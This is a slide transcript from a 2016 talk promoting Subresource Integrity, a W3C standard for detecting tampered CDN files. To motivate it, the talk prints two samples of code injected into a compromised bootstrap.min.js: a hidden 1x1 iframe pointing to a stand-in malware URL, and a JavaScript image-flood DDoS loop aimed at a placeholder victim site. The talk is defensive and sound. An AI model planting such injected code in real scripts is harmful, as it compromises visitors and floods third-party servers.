Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Application Security with Subresource Integ...

Justin Dorfman
March 16, 2016
Programming
2
3k

Web Application Security with Subresource Integrity

Subresource Integrity (SRI) is an up and coming web security standard from the W3C. SRI enables browsers to verify that files are delivered without unexpected manipulation. This slide deck will go over the history and ways to generate SRI hashes so you can start protecting your end users.

Justin Dorfman

March 16, 2016
Tweet

More Decks by Justin Dorfman

See All by Justin Dorfman
Communicating with Developers in the 21st Century
jdorfman
0
270
Annoying.js
jdorfman
0
150
Open Source is People
jdorfman
0
650

Other Decks in Programming

See All in Programming
短期間での新規プロダクト開発における「コスパの良い」Goのテスト戦略」 / kamakura.go
n3xem
2
150
rails stats で紐解く ANDPAD のイマを支える技術たち
andpad
1
280
わたしの星のままで一番星になる ~ 出産を機にSIerからEC事業会社に転職した話 ~
kimura_m_29
0
170
開発者とQAの越境で自動テストが増える開発プロセスを実現する
92thunder
1
160
Security_for_introducing_eBPF
kentatada
0
110
ゆるやかにgolangci-lintのルールを強くする / Kyoto.go #56
utgwkk
1
300
KubeCon + CloudNativeCon NA 2024 Overview at Kubernetes Meetup Tokyo #68 / amsy810_k8sjp68
masayaaoyama
0
230
talk-with-local-llm-with-web-streams-api
kbaba1001
0
170
CSC509 Lecture 14
javiergs
PRO
0
130
103 Early Hints
sugi_0000
1
180
htmxって知っていますか?次世代のHTML
hiro_ghap1
0
270
事業成長を爆速で進めてきたプロダクトエンジニアたちの成功談・失敗談
nealle
3
1.4k

Featured

See All Featured
A Philosophy of Restraint
colly
203
16k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Music & Morning Musume
bryan
46
6.2k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
33
1.9k
Being A Developer After 40
akosma
87
590k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
Put a Button on it: Removing Barriers to Going Fast.
kastner
59
3.6k
Making the Leap to Tech Lead
cromwellryan
133
9k
YesSQL, Process and Tooling at Scale
rocio
169
14k
The Cost Of JavaScript in 2023
addyosmani
45
6.9k
Bootstrapping a Software Product
garrettdimon
PRO
305
110k
Become a Pro
speakerdeck
PRO
26
5k

Transcript

  1. Subresource Integrity WEB APPLICATION SECURITY WITH

  2. $ WHOIAM

  3. $ WHOIAM JUSTIN DORFMAN

  4. $ WHOIAM JUSTIN DORFMAN MAXCDN

  5. $ WHOIAM JUSTIN DORFMAN MAXCDN DEVELOPER RELATIONS

  6. $ WHOIAM JUSTIN DORFMAN MAXCDN DEVELOPER RELATIONS OBSESSED WITH OPEN

    SOURCE & STANDARDS

  7. $ WHOIAM JUSTIN DORFMAN MAXCDN DEVELOPER RELATIONS OBSESSED WITH OPEN

    SOURCE & STANDARDS SRI ADVOCATE

  8. DEFINE “INTEGRITY”

  9. © 2011 psychicdonut.com

  10. SUBRESOURCE INTEGRITY ENABLES BROWSERS TO VERIFY THAT FILES ARE DELIVERED

    WITHOUT UNEXPECTED MANIPULATION.

  11. SUBRESOURCE INTEGRITY ENABLES BROWSERS TO VERIFY THAT FILES ARE DELIVERED

    WITHOUT UNEXPECTED MANIPULATION. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>

  12. WITH & WITHOUT SUBRESOURCE INTEGRITY

  13. None

  14. document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" 
 src=“http://example.com/no-malware-here.php"></iframe>')

  15. document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" 
 src=“http://example.com/no-malware-here.php"></iframe>') bootstrap.min.js

  16. document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" 
 src=“http://example.com/no-malware-here.php"></iframe>') bootstrap.min.js

  17. None

  18. function imgflood() { 
 var TARGET = 'victim-website.com'
 var URI

    = '/index.php?'
 var pic = new Image()
 var rand = Math.floor(Math.random() * 1000)
 pic.src = 'http://'+TARGET+URI+rand+'=val'
 }
 setInterval(imgflood, 10) demo JS code via https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/

  19. function imgflood() { 
 var TARGET = 'victim-website.com'
 var URI

    = '/index.php?'
 var pic = new Image()
 var rand = Math.floor(Math.random() * 1000)
 pic.src = 'http://'+TARGET+URI+rand+'=val'
 }
 setInterval(imgflood, 10) demo JS code via https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/ bootstrap.min.js
  20. None

  21. JAVASCRIPT DDOS!

  22. HISTORY

  23. WEB APPLICATION SECURITY WORKING GROUP

  24. SRI TIMELINE

  25. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB

  26. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG

  27. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG OCTOBER 6TH 2015 - FINAL PUBLIC WORKING DRAFT

  28. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG OCTOBER 6TH 2015 - FINAL PUBLIC WORKING DRAFT NOVEMBER 12TH 2015 - W3C CANDIDATE RECOMMENDATION

  29. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG OCTOBER 6TH 2015 - FINAL PUBLIC WORKING DRAFT NOVEMBER 12TH 2015 - W3C CANDIDATE RECOMMENDATION

  30. SUPPORT & AVAILABILITY

  31. None
  32. None

  33. Desktop Browser Support

  34. Desktop Browser Support

  35. Desktop Browser Support

  36. Desktop Browser Support

  37. Mobile Browser Support

  38. Mobile Browser Support

  39. CREATING HASHES

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None

  53. QUESTIONS?

  54. THANK YOU Read more: https://j.mp/MaxCDN-SRI Twitter/GitHub: @jdorfman